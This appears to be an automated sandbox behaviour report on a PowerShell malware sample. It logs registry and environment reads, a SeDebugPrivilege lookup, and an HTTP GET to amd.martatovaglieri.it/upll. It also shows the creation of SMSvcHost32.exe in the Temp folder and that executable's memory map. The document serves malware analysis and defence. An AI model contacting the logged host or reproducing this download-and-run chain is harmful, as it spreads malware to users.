| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
7 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
7 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
4 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\en-US\tzres.dll.mui | base_address = 0x15045710001 |
|
3 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (349)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
265 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
2 | |
| Sleep | duration = -1 (infinite) |
|
2 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
2 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
39 | |
| Get Info | type = Hardware Information |
|
39 |
Mutex (25)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
2 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
2 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 |
Environment (100)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
28 | |
| Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_Disabled |
|
1 | |
| Get Environment String | name = PinnableBufferCache_System.Threading.OverlappedData_MinCount |
|
1 | |
| Get Environment String | name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| Get Environment String | name = USERPROFILE, result_out = C:\Users\Nd9E1FYi |
|
2 | |
| Get Environment String | name = PSModuleAutoLoadingPreference |
|
13 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
4 | |
| Get Environment String | name = PATH |
|
1 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
17 | |
| Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
24 | |
| Get Environment String | name = PSDisableModuleAutoloadingCacheMaintenance |
|
1 | |
| Get Environment String | name = temp, result_out = C:\Users\Nd9E1FYi\AppData\Local\Temp |
|
2 | |
| Set Environment String | name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 0 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | amd.martatovaglieri.it |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729) |
| Server Name | amd.martatovaglieri.it |
| Server Port | 80 |
| Data Sent | 0 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = amd.martatovaglieri.it, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /upll |
|
1 |
Process #6: smsvchost32.exe
13169
267
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
| Command Line | "C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe" |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:59, Reason: Child Process |
| Unmonitor | End Time: 00:01:27, Reason: Self Terminated |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb0 |
| Parent PID | 0xff8 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
DA8
0x
CBC
0x
D54
0x
E30
0x
A40
0x
9D8
0x
D44
0x
D68
0x
814
0x
D8C
0x
370
0x
E7C
0x
F88
0x
EA0
0x
EB4
0x
748
0x
D6C
0x
BC0
0x
CC4
0x
E3C
0x
D00
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| smsvchost32.exe | 0x00400000 | 0x0043cfff | Memory Mapped File | rwx |
|
|
|
|
| locale.nls | 0x00440000 | 0x004fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x00500fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x00620fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x00630fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x00682fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x006a6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x006d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| counters.dat | 0x006e0000 | 0x006e0fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x00706fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00700fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00997fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x00b20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x01f2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaut32.dll | 0x01f30000 | 0x01fc0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02030000 | 0x02366fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x023affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023c6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x023effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023f0000 | 0x023f0000 | 0x0242ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x02446fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002470000 | 0x02470000 | 0x024affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x025affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025b0000 | 0x025b0000 | 0x026affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026b0000 | 0x026b0000 | 0x026effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0282ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x0292ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x0296ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002970000 | 0x02970000 | 0x02a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a70000 | 0x02a70000 | 0x02aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bb0000 | 0x02bb0000 | 0x02bc6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002bb0000 | 0x02bb0000 | 0x02bc7fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x0000000002bb0000 | 0x02bb0000 | 0x02caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x02d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002cb0000 | 0x02cb0000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d10000 | 0x02d10000 | 0x02d26fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002eb0000 | 0x02eb0000 | 0x02faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fb0000 | 0x02fb0000 | 0x02fc6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002fb0000 | 0x02fb0000 | 0x02fb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002fc0000 | 0x02fc0000 | 0x02fc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002fd0000 | 0x02fd0000 | 0x02fe6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fd0000 | 0x02fd0000 | 0x0300ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x0310ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003110000 | 0x03110000 | 0x0314ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x0324ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003250000 | 0x03250000 | 0x03266fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003250000 | 0x03250000 | 0x0328ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x0338ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003390000 | 0x03390000 | 0x033a6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003390000 | 0x03390000 | 0x03391fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000033a0000 | 0x033a0000 | 0x033a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000033b0000 | 0x033b0000 | 0x037aafff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000037b0000 | 0x037b0000 | 0x037c6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037b0000 | 0x037b0000 | 0x037b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037c0000 | 0x037c0000 | 0x037d6fff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x6ff40000 | 0x6ff52fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x6fff0000 | 0x6fff7fff | Memory Mapped File | rwx |
|
|
|
- |
| cmutil.dll | 0x70000000 | 0x7000efff | Memory Mapped File | rwx |
|
|
|
- |
| cmpbk32.dll | 0x70010000 | 0x70019fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x700c0000 | 0x700ebfff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x700f0000 | 0x7010ffff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x70110000 | 0x7011ffff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x70120000 | 0x70183fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x70b90000 | 0x70ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x71cd0000 | 0x71d16fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x71d20000 | 0x71d27fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x745e0000 | 0x74671fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
